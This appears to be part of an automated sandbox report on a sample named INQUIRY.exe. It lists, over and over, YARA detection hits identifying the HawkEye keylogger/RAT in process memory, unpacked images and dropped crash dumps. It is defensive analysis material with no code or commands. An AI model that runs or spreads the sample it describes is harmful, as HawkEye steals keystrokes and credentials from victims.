                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
